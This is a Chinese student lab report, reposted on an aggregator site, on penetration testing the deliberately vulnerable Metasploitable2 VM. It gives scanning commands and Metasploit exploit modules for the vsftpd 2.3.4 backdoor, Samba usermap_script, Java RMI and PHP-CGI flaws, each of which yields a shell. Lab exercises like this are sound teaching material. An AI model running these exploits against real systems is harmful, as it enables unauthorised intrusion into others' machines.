20232413 2025-2026-1 《网络与系统攻防技术》实验六实验报告

news/2025/11/17 16:39:32/文章来源:https://www.cnblogs.com/dh356456/p/19233420
Metasploit攻击渗透实践
一.实验内容
1.前期渗透操作
2.Vsftpd 源码包后门漏洞
3.Samba MS-RPC Shell 命令注入漏洞
4.Java RMI Server 命令执行漏洞
5.PHP CGI 参数执行注入漏洞
二.实验过程
2.1前期渗透操作
2.1.1主机发现(ARP扫描)
先查看靶机的IP地址,这里用的是靶机Metasploitable2

image

 

得到ip地址为192.168.48.145

启动 Kali,打开终端,输入msfconsole启动 Metasploit。

输入以下命令进行ARP扫描:

search arp_sweep

use 0

set RHOSTS 192.168.48.0/24
run

image

 得到目标主机在线,且是VMware虚拟机

2.1.2端口扫描

使用命令:

nmap -sS -sV 192.168.48.145

对靶机进行SYN扫描

image

 发现靶机上开放了大量端口和漏洞

在msfconsole中使用tcp扫描,发现靶机开放的端口如下:

image

2.2Vsftpd源码包后门漏洞(21端口)

使用命令:

nmap -sV -p 21 192.168.48.145

扫描靶机21端口

image

 看出靶机端口21开放,运行vsftpd 2.3.4

在Mestasploit中利用vsftpd 2.3.4的后门漏洞

使用命令:

use exploit/unix/ftp/vsftpd_234_backdoor

set RHOSTS 192.168.48.145
run

image

 可以看出利用该漏洞可以获取靶机shell,用ls命令能查看目录文件

2.3SambaMS-RPC Shell命令注入漏洞(端口139)

使用命令:

nmap -p 139 192.168.48.145

扫描靶机139端口

image

 在Metasploit利用漏洞,命令如下:

use exploit/multi/samba/usermap_script
set RHOST 192.168.48.145
run

image

 获得了靶机shell,并能使用命令

2.4Java RMI SERVER命令执行漏洞(1099端口)

使用命令:

nmap -p 1099 192.168.48.145

扫描靶机1099端口是否开放

image

 在Metasploit利用Java RMI执行漏洞

use exploit/multi/misc/java_rmi_server

set RHOST 192.168.48.145
run

image

 执行漏洞后,输入shell进入交互式shell,可执行各种命令

2.5PHP CGI参数执行注入漏洞(80端口)

使用命令:

nmap -p 80 192.168.48.145

扫描靶机80端口

image

 在Metasploit中利用PHP-CGI的注入漏洞

use exploit/multi/http/php_cgi_arg_injection 

set RHOST 192.168.48.145
run

image

 攻击成功后,会获得 shell,可执行命令验证

三.问题及解决方案

问题:msfconsole无法正常使用

image

 

解决方法:执行apt update更新系统包列表,再用apt install ruby-psych安装缺失的 Ruby 依赖包,随后进入 Metasploit 目录(cd /usr/share/metasploit-framework)执行bundle install --redownload修复 Gem 依赖,必要时通过msfupdate更新 Metasploit,完成后重新运行msfconsole,即可修复依赖问题并正常启动 Metasploit。

四.学习感悟、思考

本次实验通过 Metasploit 对 Metasploitable2 靶机的多个经典漏洞进行了渗透测试,掌握了主机发现、端口扫描、漏洞利用的基本流程。Metasploit 的模块化设计极大简化了渗透测试步骤,但实际攻击中需注意目标网络环境和权限限制。通过实验深刻认识到服务版本漏洞的危害性,后续应加强对服务器版本管理和漏洞补丁的重视。

 

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/968082.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

NOIP 模拟赛 7 总结

分数:\(50 + 0 + 19 + 0 = 69\)别样的 subtask 大战。 别样的配分大战。 别样的爆零大战。 别样的 IceBee 大战。T1 当时在场上苦思冥想了半天没有结果,是因为忽略了一条重要性质:序列是一个排列。可以证明:最小生…

20232314 2025-2026-1 《网络与系统攻防技术》实验六实验报告

一、实验内容下载官方靶机Metasploitable2,完成下面实验内容。(1)前期渗透①主机发现(可用Aux中的arp_sweep,search一下就可以use)②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。③选做:也可以扫…

在AI技术唾手可得的时代,挖掘新需求成为制胜关键——某知名智能支付协议需求探索

本文深入分析某知名智能支付协议的核心功能与应用场景,基于大量用户反馈识别出多个关键需求,包括多语言支持、跨平台兼容性、多样化支付方式集成等,为开发者提供全面的技术洞察。内容描述 核心功能定位 该项目是一个…

2025年护士站板材订做厂家权威推荐榜单:医疗防护抗倍特板/医用抗倍特板/医疗洁净板源头厂家精选

面对医院人流量大、病菌易传播的环境特点,超过75%的新建医院项目在选择护士站板材时,将抗菌性能、耐用性和环保安全性作为核心考量指标。 护士站作为医疗区域的核心工作单元,其材质直接影响到医疗环境的卫生安全和长…

2025年茉莉花茶定做厂家权威推荐榜单:青梅绿茶/无糖茶/乌龙茶源头厂家精选

在竞争激烈的茶饮市场中,一批专注于定制化生产的茉莉花茶厂家正以卓越的技术实力和灵活的服务模式赢得市场青睐。 茉莉花茶作为中国传统再加工茶类的重要组成部分,近年来在定制化市场呈现出显著的增长趋势。据行业调…

【项目复现上新】LLaMA Factory 微调实践:从零构建苏东坡角色扮演大模型 | 附Lab4AI平台一键复现指南

【项目复现上新】LLaMA Factory 微调实践:从零构建苏东坡角色扮演大模型 | 附Lab4AI平台一键复现指南 你是谁? 我是多才多艺的文学家、书法家和画家,我是苏东坡,我……这是微调后大模型的回答,随着人工智能的发展…

CF2164D Copy String

首先注意到一个事情,每次操作相当于将一些段给拓展了一下,我们得出以下结论:如果一个位置顿了一下又拓展,我们必然可以将其调整为先拓展最后不动。且:所有对答案没有贡献的位置,从一开始就不会移动。注意到 \(n …

winform中消息机制使用CommunityToolkit.Mvvm

最近在学习wpf,使用CommunityToolkit.Mvvm发现其中的消息机制很好用,想着在winform中测试一下,果然也能用。 ***注册***`WeakReferenceMessenger.Default.Register<UserLoggedInMessage>(this, (recipient, m…

使用agGrid的社区版实现层级列表显示

使用agGrid的社区版实现层级列表显示<!DOCTYPE html> <html lang="zh-CN"> <head><meta charset="UTF-8"><meta name="viewport" content="width=devi…

case linux

你提到的“case linux”可能是一个表述上的误差或简写。如果你是想询问与 Linux 系统相关的问题,我非常乐意帮助你。请具体说明你感兴趣的内容,例如:Linux 命令行使用 Shell 脚本编写 系统管理(如文件系统、进程管…

2025年在淮安婚纱照拍摄团队公司实力盘点,弥素摄影工作室领衔十大精品机构

定格时光,珍藏爱情,用专业影像诠释独属于你们的浪漫故事。 近年来,淮安婚纱摄影行业迎来了品质升级的浪潮。据淮安市摄影行业协会数据显示,2024年淮安地区婚纱摄影市场规模预计突破亿元,个性化定制需求增长达35%,…

cadence linux

您提到的“Cadence Linux”可能是指与 Cadence 公司相关的 Linux 系统,Cadence 是一家知名的半导体设计公司,其产品包括用于 FPGA、ASIC 和 IC 设计的工具链,如 Cadence Incisive、Cadence Virtuoso 等。 如果您是想…

当下山西比较好的纪念馆展示柜工厂排行榜揭晓

摘要 纪念馆展示柜行业在2025年迎来快速发展,随着文化强国战略的推进,山西地区成为文博设施建设的重要区域。本文基于行业数据和用户口碑,为您呈现山西纪念馆展示柜厂家排名前十的权威榜单,旨在帮助文博单位高效选…

2025年山西博物馆展示柜厂家排名前十推荐:专业评测与选择指南

摘要 随着文博产业的快速发展,博物馆展示柜行业在2025年迎来创新高潮,智能化、定制化成为主流趋势。本文基于权威数据和市场调研,为您呈现山西地区博物馆展示柜厂家排名前十的详细榜单,旨在帮助用户规避选择误区,…

2025年山西博物馆展示柜厂家排名前十权威推荐

摘要 随着文博产业的快速发展,博物馆展示柜作为文物保护和展示的核心载体,行业需求持续增长。2025年,山西地区博物馆展示柜厂家竞争激烈,本文基于技术实力、口碑评价和服务案例,为您呈现排名前十的厂家综合评测。…

2025年四川硬芯线厂家排名前十权威评测及行业选择指南

摘要 硬芯线作为电线电缆行业的核心产品,广泛应用于电力、建筑、新能源和工业自动化等领域。随着2025年新能源和智能电网的快速发展,四川地区硬芯线市场需求持续增长,厂家竞争加剧。本文基于行业数据和技术参数,综…

2025年封闭母线槽厂家综合实力排行榜前十强权威发布

摘要 随着我国电力基础设施建设的快速发展,封闭母线槽行业在2025年迎来新一轮技术革新与市场洗牌。本文基于行业数据调研、技术参数对比和用户口碑反馈,综合评估国内主流封闭母线槽厂家的综合实力,为电力工程企业、…

百度贴吧 电子工程世界 哔哩哔哩 凯迪网 一牛网 电子工程网 思否 知乎 技术邻

VKL060是一个点阵式存储映射的LCD驱动器,可支持最大60点(15SEGx4COM)的 LCD屏。单片机可通过I2C接口配置显示参数和读写显示数据,可配置4种功耗模式,也可通 过关显示和关振荡器进入省电模式。其高抗干扰,低功耗的…

2025年国内锯条品牌口碑推荐排行榜TOP10权威发布

文章摘要 随着制造业的快速发展,2025年国内锯条行业迎来新一轮技术革新与市场洗牌。本文基于行业数据调研、用户口碑评价及技术参数对比,为您呈现本年度最具权威性的锯条品牌排行榜单。榜单综合考量企业技术实力、产…

Codeforces Round 1064 (Div. 2) 做题记录

T1看了这么多 T1,终于找到简单题了!!!发现最后一个点无法更改,要使所有点都相等,也就是让 \(1 \sim n-1\) 的所有点都和 \(n\) 号点相等。 那么修改的次数就是 \(1 \sim n-1\) 中和 \(n\) 号点不同的点的数量。 …